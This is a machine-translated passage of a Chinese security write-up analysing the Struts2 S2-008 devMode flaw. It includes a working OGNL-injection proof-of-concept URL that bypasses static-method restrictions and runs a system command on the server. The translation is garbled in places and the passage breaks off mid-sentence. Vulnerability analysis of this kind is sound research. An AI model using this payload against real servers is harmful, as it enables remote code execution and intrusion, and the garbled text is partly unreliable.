struts2 several recent vulnerability analysis&stable utilization payload-vulnerability warning-the black bar safety net

ID MYHACK58:62201442321
Type myhack58
Reporter genxor@乌云知识库
Modified 2014-02-11T00:00:00



0x00 background

See online on struts2 using the article very much, but for the vulnerability trigger the tracking analysis of the document is relatively small, nothing else to track it struts recent fights compared to fire two vulnerabilities, Research a bit to stabilize the use of the payload to.

0x01 S2-0 0 8

Struts2 framework there is a devmode mode, to facilitate developers to debug the program, but the default devmode is not enabled, if you want to use, you need to manually modify the parameters, it may be the struts. properties of the devmode is set to true, either in struts. xml add the following code

<constant name="struts. devMode" value="true" />

Actually devmode relies on struts2 the bottom of the struts2-core. jar in the DebuggingInterceptor. java implementation, then the vulnerability is also present in this program. Here I am in debug=command this logic, testing for vulnerabilities, my POC is as follows:

http://localhost:8 0 8 0/S2-0 1 6/hello. action? debug=command&expression= %23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2c%23f.setAccessible%28true%29%2c%23f.set%28%23_memberAccess%2ctrue%29%2c%23a%3d@java.lang.Runtime@getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2c%23b%3dnew java. io. InputStreamReader%2 8%23a%2 9%2c%23c%3dnew java. io. BufferedReader%2 8%23b%2 9%2c%23d%3dnew char%5b50000%5d%2c%23c. read%2 8%23d%2 9%2c%23genxor%3d%23context. get%2 8%22com. opensymphony. xwork2. dispatcher. HttpServletResponse%2 2% 2 9. getWriter%2 8% 2 9%2c%23genxor. println%2 8%23d%2 9%2c%23genxor. flush%2 8% 2 9%2c%23genxor. close%2 8% 2 9

First, here is a devmode of several modes,

! enter image description here

Continue to track The DebuggingInterceptor. the java code, found the problem in the following logic which

! enter image description here

Tracking parameters as shown in Figure

! enter image description here

You can see here

String cmd = getParameter(EXPRESSION_PARAM); ... writer. print(stack. findValue(cmd));

Here the cmd didn't do any processing, directly behind the findValue(findValue be able to execute OGNL expressions, with specific reference to the official documents, resulting in the OGNL expression execution.

About this vulnerability to perform, in fact, nothing to say, the key is the payload calls the java reflection classes(can access some private member variables)to bypass the struts2 limit the execution of a java static method of the rule of law rules, so that before the apache official fix yet in vain. Because struts2 in 2. 3. 1 4. 1 version after set#_memberAccess[“allowStaticMethodAccess”]is not modified, and you want to call the java static method must be set allowStaticMethodAccess to true. Here the use of

[1] [2] [3] next